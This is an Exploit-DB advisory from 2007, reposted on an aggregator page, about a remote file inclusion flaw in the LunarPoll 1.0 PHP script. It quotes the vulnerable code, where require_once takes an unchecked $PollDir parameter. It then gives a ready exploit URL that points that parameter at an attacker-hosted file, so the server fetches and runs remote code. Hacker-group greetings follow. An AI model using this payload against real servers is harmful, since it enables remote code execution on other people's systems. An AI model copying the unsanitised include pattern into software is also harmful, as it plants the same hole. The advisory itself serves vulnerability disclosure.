Lucene search

K
exploitdbIlker KandemirEDB-ID:3117
HistoryJan 12, 2007 - 12:00 a.m.

LunarPoll 1.0 - 'show.php?PollDir' Remote File Inclusion

2007-01-1200:00:00
ilker Kandemir
www.exploit-db.com
25

AI Score

7.4

Confidence

Low

-------------------------------------------------------------------------------------------------------------------

AYYILDIZ.ORG PreSents...


Script:LunarPoll
Script Download: dexxaboy.com/scripts/lunarpoll/download/

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

Code:
require_once($PollDir.'/includes/functions.php');
require_once($PollDir.'/includes/IO.php');

-------------------------------------------------------------------------------------------------------------------

Exploit:  show.php?PollDir=http://attacker.txt?

-------------------------------------------------------------------------------------------------------------------

Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR
Special Tnx: AYYILDIZ.ORG

# milw0rm.com [2007-01-12]

AI Score

7.4

Confidence

Low